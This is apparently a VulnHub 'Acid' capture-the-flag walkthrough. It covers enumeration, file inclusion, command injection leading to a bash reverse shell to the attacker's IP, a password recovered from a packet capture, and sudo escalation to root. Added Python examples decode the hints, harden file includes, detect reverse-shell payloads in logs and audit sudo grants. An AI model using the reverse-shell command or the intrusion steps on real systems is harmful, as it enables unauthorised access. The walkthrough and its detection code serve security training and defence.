【VulnHub】Acid box walkthrough

0x01 Environment setup

1. Target VM download address
2. Attack machine (Kali) address: 192.168.199.134

0x02 Target discovery

Set the network mode of both the attack machine and the target VM to NAT, discover hosts with nmap -sn, shut down the target and scan again; the host that disappears is the target's IP.

0x03 Information gathering

1. Port scan: port 33447 is found open

┌──(root💀kali)-[~]
└─# nmap -p- 192.168.199.128
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 20:42 EST
Nmap scan report for 192.168.199.128
Host is up (0.00044s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
33447/tcp open  unknown
MAC Address: 00:0C:29:BB:65:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

Browse to port 33447 in a web browser.

2. Web scanning

(1) Scanning with the big.txt wordlist turns up an images directory and the Thumbs.db file (a thumbnail database) inside it, which leads nowhere.

┌──(root💀kali)-[~]
└─# dirb http://192.168.199.128:33447 /usr/share/wordlists/dirb/big.txt                                255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 20:48:26 2022
URL_BASE: http://192.168.199.128:33447/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/ ----
==> DIRECTORY: http://192.168.199.128:33447/css/                                                            
==> DIRECTORY: http://192.168.199.128:33447/images/                                                         
+ http://192.168.199.128:33447/server-status (CODE:403|SIZE:306)                                            
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/css/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/images/ ----
+ http://192.168.199.128:33447/images/Thumbs.db (CODE:200|SIZE:31744)                                       
                                                                                                            
-----------------
END_TIME: Thu Mar  3 20:49:00 2022
DOWNLOADED: 61374 - FOUND: 2

(2) Looking at the page source reveals a hint string: 0x643239334c6d70775a773d3d

Decoding it twice with a decoder yields wow.jpg.
Following the usual line of thought, we suspect the image hides data; running cat on it shows hexadecimal digits at the end of the file.
Converting 3761656530663664353838656439393035656533376631366137633631306434 from hex to ASCII gives 7aee0f6d588ed9905ee37f16a7c610d4, which is an MD5 hash. Looking it up on cmd5 gives 63425, presumably a password or an ID. At this point wow.jpg looks like a rabbit hole left by the challenge author, so we drop it and look at the other leads.
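The two-step decode (hex, then base64) and the hex-to-ASCII step on the image trailer can be done without a web decoder. The Python below is an added example, not part of the original post: it peels hex and base64 layers until nothing decodes further, recognises a 32-character hex string as MD5-shaped, and verifies a candidate plaintext locally against a hash rather than trusting a lookup site. The two input strings are the ones from this page; the `check_candidate` demonstration uses the standard MD5 test vector for "abc".

```python
import base64
import binascii
import hashlib
import re

# Inputs taken from the walkthrough: the page-source hint and the trailing bytes of wow.jpg.
PAGE_HINT = "0x643239334c6d70775a773d3d"
IMAGE_TRAILER = "3761656530663664353838656439393035656533376631366137633631306434"

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def try_hex(s):
    """Decode an even-length hex string (optional 0x prefix) to ASCII text, or None."""
    body = s[2:] if s.lower().startswith("0x") else s
    if not HEX_RE.match(body) or len(body) % 2:
        return None
    try:
        return binascii.unhexlify(body).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def try_base64(s):
    """Decode a padded base64 string to ASCII text, or None."""
    if not B64_RE.match(s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def peel(s, max_layers=5):
    """Strip encoding layers until nothing decodes; return (final text, names of layers removed)."""
    layers = []
    cur = s.strip()
    for _ in range(max_layers):
        for name, fn in (("hex", try_hex), ("base64", try_base64)):
            out = fn(cur)
            # only accept a layer that yields printable text, so random bytes do not count as a decode
            if out is not None and out.isprintable() and out != cur:
                layers.append(name)
                cur = out
                break
        else:
            break
    return cur, layers


def looks_like_md5(s):
    """32 lowercase hex characters is the shape of an MD5 digest (not proof of one)."""
    return bool(MD5_RE.match(s.lower()))


def check_candidate(candidate, md5_hex):
    """Confirm a recovered plaintext against a digest locally instead of trusting a lookup site."""
    return hashlib.md5(candidate.encode()).hexdigest() == md5_hex.lower()
```

`peel(PAGE_HINT)` returns `("wow.jpg", ["hex", "base64"])`; the image trailer decodes one layer to the MD5-shaped string and then stops, because the second hex or base64 decode produces non-ASCII bytes.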

(3) Back on the home page, the title tag carries a hint that reveals a new directory, a common CTF hint pattern.

(4) Scan the /Challenge directory: subdirectories and PHP pages are found

┌──(root💀kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 22:03:29 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
==> DIRECTORY: http://192.168.199.128:33447/Challenge/css/                                                  
==> DIRECTORY: http://192.168.199.128:33447/Challenge/includes/                                             
==> DIRECTORY: http://192.168.199.128:33447/Challenge/js/                                                   
==> DIRECTORY: http://192.168.199.128:33447/Challenge/styles/                                               
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/css/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/includes/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/js/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/styles/ ----
                                                                                                            
-----------------
END_TIME: Thu Mar  3 22:04:23 2022
DOWNLOADED: 102290 - FOUND: 0

Submitting an arbitrary parameter shows that the page is a PHP page.

(5) Scanning with the -X parameter finds the pages cake.php, error.php, include.php and index.php

┌──(root💀kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 22:09:32 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
+ http://192.168.199.128:33447/Challenge/cake.php (CODE:200|SIZE:496)                                       
+ http://192.168.199.128:33447/Challenge/error.php (CODE:200|SIZE:309)                                      
+ http://192.168.199.128:33447/Challenge/include.php (CODE:302|SIZE:0)                                      
+ http://192.168.199.128:33447/Challenge/index.php (CODE:200|SIZE:1333)      

(6) Visiting include.php triggers a 302 redirect

It redirects to a login page; entering any username and password yields a cookie, after which include.php can be revisited.
With Burp Suite, a file inclusion vulnerability is found that allows reading /etc/passwd.
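The redirect-then-include behaviour above is a classic local file inclusion. The Python below is an added illustration, not the target's include.php (whose source the page does not show): it contrasts the vulnerable pattern of joining a request parameter straight onto a filesystem path with a hardened version that allow-lists page names and confines the resolved real path to the pages directory. The temporary directory, file contents and the `ALLOWED_PAGES` set are constructed for the demonstration.

```python
import os
import tempfile

# Constructed stand-in for a web root: one legitimate page and one file outside the pages directory.
ROOT = tempfile.mkdtemp()
PAGES = os.path.join(ROOT, "pages")
os.makedirs(PAGES)
with open(os.path.join(PAGES, "cake.html"), "w") as f:
    f.write("cake page")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("file outside the pages directory")

# Hypothetical allow-list; in a real app this is the closed set of includable templates.
ALLOWED_PAGES = {"cake", "index", "error"}


def include_unsafe(page):
    """The vulnerable shape: the request parameter is joined straight onto the path, so a
    value such as '../secret.txt' walks out of the pages directory. This is the same class
    of mistake that lets include.php on the target serve /etc/passwd."""
    with open(os.path.join(PAGES, page)) as f:
        return f.read()


def include_safe(page):
    """Hardened shape: an allow-list of page names, a fixed extension, and a containment
    check on the resolved real path so neither '..' nor a planted symlink escapes PAGES."""
    if page not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(PAGES)
    target = os.path.realpath(os.path.join(base, page + ".html"))
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None  # a listed page that is missing is an error, not a reason to widen the search
    with open(target) as f:
        return f.read()
```

The allow-list alone already stops traversal; the `realpath` containment check is kept as a second layer so that a symlink dropped into the pages directory (or a future change that relaxes the allow-list) still cannot read outside it.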

(7) Since there is no upload point, we revisit cake.php and find a subdirectory, /Magic_Box

(8) Another -X scan finds low.php and command.php; command.php has a command execution vulnerability

0x04 Exploitation

Send a URL-encoded command to get a bash reverse shell

bash -c 'bash -i >& /dev/tcp/192.168.199.134/6666 0>&1'

We get a reverse shell.
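From the defender's side, the URL-encoded command sent to command.php leaves a clear trace in the web server's access log. The Python below is an added example, not part of the original post: it parses Apache combined-format lines, decodes each query parameter value (repeatedly, to undo double encoding), and flags shell metacharacters and the reverse-shell pattern used above. The log lines are constructed; the parameter name `cmd` is an assumption, since command.php's source is not shown on the page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines. Line 2 carries the walkthrough's payload URL-encoded;
# the parameter name "cmd" is assumed. Line 3 is a benign multi-parameter request for contrast.
SAMPLE_LOG = """\
192.168.199.134 - - [03/Mar/2022:22:40:11 -0500] "GET /Challenge/Magic_Box/command.php?cmd=127.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.199.134 - - [03/Mar/2022:22:41:02 -0500] "GET /Challenge/Magic_Box/command.php?cmd=127.0.0.1%3Bbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.199.134%2F6666%200%3E%261%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.199.134 - - [03/Mar/2022:22:41:30 -0500] "GET /Challenge/index.php?page=1&sort=asc HTTP/1.1" 200 1333 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
META_RE = re.compile(r"[;|&`$]")                 # command separators and substitution characters
REVSHELL_RE = re.compile(r"/dev/tcp/|bash -i|0>&1")  # pieces of the payload shown on this page


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding; a single decode misses doubly-encoded values."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def analyze(line):
    """Parse one log line; return its decoded query values and the reasons it was flagged."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qs splits on '&' before decoding, so a legitimate separator between parameters
    # is never mistaken for a shell operator inside a value
    values = {k: [fully_decode(v) for v in vs]
              for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = []
    for k, vs in values.items():
        for v in vs:
            if META_RE.search(v):
                reasons.append("shell metacharacter in parameter %s" % k)
            if REVSHELL_RE.search(v):
                reasons.append("reverse-shell indicator in parameter %s" % k)
    return {"src": m["src"], "time": m["ts"], "path": parts.path,
            "status": m["status"], "values": values, "reasons": reasons}


def suspicious_requests(log_text):
    """Return the analysis of every line that raised at least one reason."""
    return [r for r in (analyze(l) for l in log_text.splitlines()) if r and r["reasons"]]
```

Only the second line is flagged: its decoded `cmd` value contains a `;` separator and the `/dev/tcp/` and `bash -i` fragments. The benign `page=1&sort=asc` request is not, because the `&` is consumed as a parameter separator before any value is inspected.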

0x05 Privilege escalation

1. Spawn an interactive shell with Python

python -c 'import pty;pty.spawn("/bin/bash")'

2. In the /tmp directory, wget and gcc are not installed, suggesting the intended route is not an overflow exploit but finding a password

┌──(root💀kali)-[~]
└─# nc -lvp 6666                                                                                         1 ⨯
listening on [any] 6666 ...
192.168.199.128: inverse host lookup failed: Unknown host
connect to [192.168.199.134] from (UNKNOWN) [192.168.199.128] 33055
bash: cannot set terminal process group (1430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /tmp
cd /tmp
www-data@acid:/tmp$ wget
wget
The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget'
www-data@acid:/tmp$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@acid:/tmp$ 

3. There are two users, acid and saman

www-data@acid:/tmp$ ls /home       
ls /home
acid
saman
www-data@acid:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
www-data@acid:/tmp$ 

4. Look at user files

Privilege-escalation challenges of this kind usually come down to finding a regular user's password in some file and then escalating through sudo or SUID, so the command for locating a user's files is essential to memorize and use fluently

find / -user acid 2>/dev/null

Go into the home directory; there are two regular users, acid and saman. Listing the files owned by acid reveals a packet capture, hint.pcapng

www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /home
cd /home
www-data@acid:/home$ ls
ls
acid
saman
www-data@acid:/home$ find / -user acid 2>/dev/null
find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
/bin/pwn_me
/bin/pwn_me/chkrootkit.lsm
/bin/pwn_me/chkrootkit
/bin/pwn_me/README.chkwtmp
/bin/pwn_me/ACKNOWLEDGMENTS
/bin/pwn_me/chkdirs.c
/bin/pwn_me/ifpromisc.c
/bin/pwn_me/Makefile
/bin/pwn_me/chklastlog.c
/bin/pwn_me/strings.c
/bin/pwn_me/chkwtmp.c
/bin/pwn_me/README.chklastlog
/bin/pwn_me/COPYRIGHT
/bin/pwn_me/chkproc.c
/bin/pwn_me/README
/bin/pwn_me/chkutmp.c
/bin/pwn_me/check_wtmpx.c
/var/lib/lightdm-data/acid
/var/www/html/Challenge/less
/var/www/html/Challenge/less/style.less
/var/www/html/Challenge/css
/var/www/html/Challenge/css/style.css
/var/www/html/Challenge/css/style.css.save
/var/www/html/index.html
/var/www/html/images
/var/www/html/images/bg.jpg
/var/www/html/images/Thumbs.db
/var/www/html/images/wow.jpg
/var/www/html/css
/var/www/html/css/style.css
/home/acid
/home/acid/.xsession-errors.old
/home/acid/Public
/home/acid/.thumbnails
/home/acid/Desktop
/home/acid/.mozilla
/home/acid/.gconf
/home/acid/Videos
/home/acid/Templates
/home/acid/.config
/home/acid/Music
/home/acid/.profile
/home/acid/.bashrc
/home/acid/.sudo_as_admin_successful
/home/acid/Downloads
/home/acid/.xsession-errors
/home/acid/.dmrc
/home/acid/.Xauthority
/home/acid/.local
/home/acid/.local/share
/home/acid/.xscreensaver
/home/acid/.bash_history
/home/acid/.bash_logout
/home/acid/.cache
/home/acid/.cache/ibus
/home/acid/.cache/ibus/bus
/home/acid/.cache/ibus/bus/registry
/home/acid/.cache/update-manager-core
/home/acid/.cache/update-manager-core/meta-release
/home/acid/.cache/event-sound-cache.tdb.d08d798c4c9c42baa2b60403184f4c66.i686-pc-linux-gnu
/home/acid/.cache/lxpanel-indicator-plugin.log
/home/acid/.cache/fontconfig
/home/acid/.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le32d4.cache-4
/home/acid/.cache/fontconfig/CACHEDIR.TAG
/home/acid/.cache/motd.legal-displayed
/home/acid/.cache/vmware
/home/acid/.cache/openbox
/home/acid/.cache/openbox/openbox.log
/home/acid/.cache/openbox/sessions
/home/acid/.cache/lxsession
/home/acid/.cache/lxsession/Lubuntu
/home/acid/.cache/lxsession/Lubuntu/run.log
/home/acid/.cache/usb-creator.log
/home/acid/.cache/gstreamer-1.0
/home/acid/.cache/gstreamer-1.0/registry.i686.bin
/home/acid/.cache/menus
/home/acid/.cache/mozilla
/home/acid/.dbus
/home/acid/Documents
/home/acid/.selected_editor
/home/acid/Pictures

5. Analyzing the capture file reveals saman's password

Copy the capture into the web directory, download it to Kali, open it and filter on data; saman's password is 1337hax0r
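The capture step above is done by eye in Wireshark. As an added example that is not part of the original post, the Python below builds a small constructed pcapng file, walks its blocks honouring the section's byte-order magic, and scans packet bytes for cleartext credential patterns, which is what the `data` filter plus a quick read in Wireshark achieves. The capture is constructed with LINKTYPE_USER0 (147) so each packet carries raw application data rather than Ethernet/IP/TCP headers; the sample payloads are made up, except that saman's password from this page appears in one of them.

```python
import re
import struct

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006
BYTE_ORDER_MAGIC = 0x1A2B3C4D
LINKTYPE_USER0 = 147  # user-defined link type: packets here are raw application bytes

# Constructed payloads; only "1337hax0r" is taken from the page.
SAMPLE_PAYLOADS = [
    b"login: saman\r\n",
    b"Password: 1337hax0r\r\n",
    b"Welcome saman\r\n",
    b"\x00\x01\x02\xff\xfe\x10binary noise",
    b"USER anonymous\r\nPASS guest\r\n",
]


def _block(btype, body, endian="<"):
    """Frame one pcapng block: type, total length, body padded to 4 bytes, total length again."""
    body += b"\x00" * (-len(body) % 4)
    total = 8 + len(body) + 4
    return struct.pack(endian + "II", btype, total) + body + struct.pack(endian + "I", total)


def build_capture(payloads, endian="<"):
    """Minimal pcapng: one Section Header, one Interface Description, one Enhanced Packet per payload."""
    shb = _block(SHB, struct.pack(endian + "IHHq", BYTE_ORDER_MAGIC, 1, 0, -1), endian)
    idb = _block(IDB, struct.pack(endian + "HHI", LINKTYPE_USER0, 0, 65535), endian)
    epbs = b"".join(
        _block(EPB, struct.pack(endian + "IIIII", 0, 0, i, len(p), len(p)) + p, endian)
        for i, p in enumerate(payloads)
    )
    return shb + idb + epbs


def iter_packets(data):
    """Walk the block chain and yield the captured bytes of every Enhanced Packet Block."""
    endian = "<"
    off = 0
    while off + 8 <= len(data):
        btype = struct.unpack_from(endian + "I", data, off)[0]
        if btype == SHB:  # the SHB type is byte-symmetric, so it reads the same in either order
            magic = struct.unpack_from("<I", data, off + 8)[0]
            endian = "<" if magic == BYTE_ORDER_MAGIC else ">"
        total = struct.unpack_from(endian + "I", data, off + 4)[0]
        if total < 12 or off + total > len(data):
            raise ValueError("truncated or corrupt block at offset %d" % off)
        if btype == EPB:
            caplen = struct.unpack_from(endian + "I", data, off + 20)[0]
            yield data[off + 28: off + 28 + caplen]
        off += total


# keyword, optional ':' or '=', then a printable token: the shape of prompt-style and FTP-style logins
CRED_RE = re.compile(rb"(?i)\b(pass(?:word|wd)?|user(?:name)?|login)\b\s*[:=]?\s*([!-~]{3,})")


def find_cleartext_credentials(data):
    """Return (packet index, field name, value) for every credential-looking string in the capture."""
    hits = []
    for idx, pkt in enumerate(iter_packets(data)):
        for m in CRED_RE.finditer(pkt):
            hits.append((idx, m.group(1).decode().lower(), m.group(2).decode()))
    return hits
```

The scanner does not decode protocol headers; it pattern-matches the raw bytes of each packet, so on a real Ethernet capture the same regex still finds credentials inside the TCP payload. A `ValueError` on a block whose declared length runs past the end of the file stops the parser from reading garbage as packets.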

6. Escalate through the sudo misconfiguration

Spawn an interactive shell with Python's pty and switch to saman with su; the password is correct. sudo turns out to be misconfigured with far too much privilege, so we escalate straight to root

www-data@acid:/home$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@acid:/home$ ls
ls
acid  saman
www-data@acid:/home$ su - saman
su - saman
Password: 1337hax0r

saman@acid:~$ whoami
whoami
saman
saman@acid:~$ sudo -l
sudo -l
[sudo] password for saman: 1337hax0r

Matching Defaults entries for saman on acid:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User saman may run the following commands on acid:
    (ALL : ALL) ALL
saman@acid:~$ sudo su -
sudo su -
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   
root@acid:~# 
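The single `(ALL : ALL) ALL` entry above is the whole privilege escalation. The Python below is an added example, not from the original post: it parses `sudo -l` output of the shape shown into runas/tag/command entries and flags unrestricted, passwordless or wildcard grants, which is what a sudoers review should catch. The first sample is the output from this page; the second (`ops` on `host`) is constructed for contrast.

```python
import re

# Sample 1: sudo -l output verbatim from this page.
SAMAN_SUDO_L = r"""Matching Defaults entries for saman on acid:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User saman may run the following commands on acid:
    (ALL : ALL) ALL
"""

# Sample 2: constructed output for a narrower, but still imperfect, grant.
OPS_SUDO_L = """User ops may run the following commands on host:
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/apt-get update
    (root) /usr/bin/tail /var/log/nginx/*
"""

USER_LINE_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):")
# (runas_user[:runas_group]) [TAG: ...] command  -- the per-line shape under "may run"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Extract the command entries from sudo -l output as dicts."""
    entries = []
    user = host = None
    for line in text.splitlines():
        um = USER_LINE_RE.match(line)
        if um:
            user, host = um["user"], um["host"]
            continue
        if user is None:
            continue  # still inside the "Matching Defaults" preamble
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user, _, runas_group = m["runas"].partition(":")
        entries.append({
            "user": user,
            "host": host,
            "runas_user": runas_user.strip(),
            "runas_group": runas_group.strip() or None,
            "tags": [t.rstrip(":") for t in m["tags"].split()],
            "command": m["cmd"],
        })
    return entries


def audit(entries):
    """Rate each entry: ALL is root-equivalent; NOPASSWD and wildcards widen the exposure."""
    findings = []
    for e in entries:
        who = "%s on %s" % (e["user"], e["host"])
        if e["command"] == "ALL":
            findings.append(("critical", "%s: any command as %s, root-equivalent" % (who, e["runas_user"])))
        if "NOPASSWD" in e["tags"]:
            findings.append(("medium", "%s: %s runs without a password" % (who, e["command"])))
        if "*" in e["command"]:
            findings.append(("medium", "%s: wildcard in %s" % (who, e["command"])))
    return findings
```

For saman the audit returns one critical finding; the constructed `ops` grant returns two medium findings (a passwordless restart and a wildcard path), which is the kind of output a periodic sudoers review can feed into a ticket before a leaked password turns it into root.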
